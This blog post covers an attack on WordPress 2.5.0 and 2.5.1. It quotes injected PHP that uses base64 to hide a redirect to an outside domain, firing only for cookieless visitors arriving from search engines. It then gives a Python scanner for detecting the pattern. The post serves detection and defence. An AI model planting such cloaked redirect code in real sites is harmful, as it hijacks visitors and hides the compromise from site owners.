WordPress 2.5.0 and 2.5.1 vulnerable to attack
Thanks to co-author Brandon Palmen for the heads-up about a WordPress hack in progress. The attackers are using a few obfuscation tricks to inject code into WordPress installations using a recently announced vulnerability. More details in a well-written write-up here.
The code snippets below, from a digitalpoint.com forum, use base64 encoding to hide the true destination:
<?php
// Search-engine names matched against the Referer header
$seref = array("google", "msn", "live", "altavista", "ask",
               "yahoo", "aol", "cnn", "weather", "alexa");
$ser = 0;
foreach ($seref as $ref)
    if (strpos(strtolower($_SERVER['HTTP_REFERER']), $ref) !== false)
    { $ser = "1"; break; }
// Redirect only visitors who arrive from a search engine with no cookies set
if ($ser == "1" && sizeof($_COOKIE) == 0)
{
    header("Location:http://" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "/");
    exit;
}
?>
This code shows yet another trend we’ve noticed at stopbadware.org: exploiting only those requests that come directly from a search engine. Here the redirect fires only when the Referer header names a search engine and the request carries no cookies. We can only conclude this is to prevent (or delay) detection and maximize infection duration.
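
A defender-side check for the pattern above, as an added example that is not part of the original post: it scans PHP source for `base64_decode("...")` string literals, decodes them, and reports the ones used on a `header("Location: ...")` line together with the Referer and cookie conditions. The function names and report keys are choices made for this example, and the embedded sample is the snippet quoted above.

```python
import base64
import binascii
import re

# Sample input: the injected snippet quoted in this post.
SAMPLE = r'''<?php
$seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
$ser=0;
foreach($seref as $ref)
if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false)
{ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0)
{
header("Location:http://" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "/");
exit;
}
?>'''

# base64_decode() called on a quoted literal, and a Location header being sent
B64_CALL = re.compile(r'base64_decode\s*\(\s*(["\'])([A-Za-z0-9+/=]+)\1\s*\)')
REDIRECT = re.compile(r'header\s*\(\s*["\']Location:', re.I)

def decode_literals(php_source):
    """Return (line_no, decoded_text) for each base64_decode("literal") call."""
    hits = []
    for no, line in enumerate(php_source.splitlines(), 1):
        for m in B64_CALL.finditer(line):
            try:
                raw = base64.b64decode(m.group(2), validate=True)
                hits.append((no, raw.decode("utf-8", "replace")))
            except (binascii.Error, ValueError):
                continue  # not valid base64, ignore
    return hits

def scan(php_source):
    """Report the cloaking conditions and any redirect target hidden in base64."""
    lines = php_source.splitlines()
    redirect_lines = {n for n, l in enumerate(lines, 1) if REDIRECT.search(l)}
    decoded = decode_literals(php_source)
    return {
        "referer_check": "HTTP_REFERER" in php_source,
        "cookie_check": "$_COOKIE" in php_source,
        "hidden_redirect_targets": [t for n, t in decoded if n in redirect_lines],
    }

if __name__ == "__main__":
    print(scan(SAMPLE))
```

Run over theme and core PHP files, a non-empty `hidden_redirect_targets` list alongside a Referer check is a strong sign of this kind of search-engine-only redirect.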

The Wordpress 2.5.0 and 2.5.1 vulnerable to attack by Zeroday 01100100011010010, unless otherwise expressly stated, is licensed under a Creative Commons Attribution-Share Alike 3.0 License.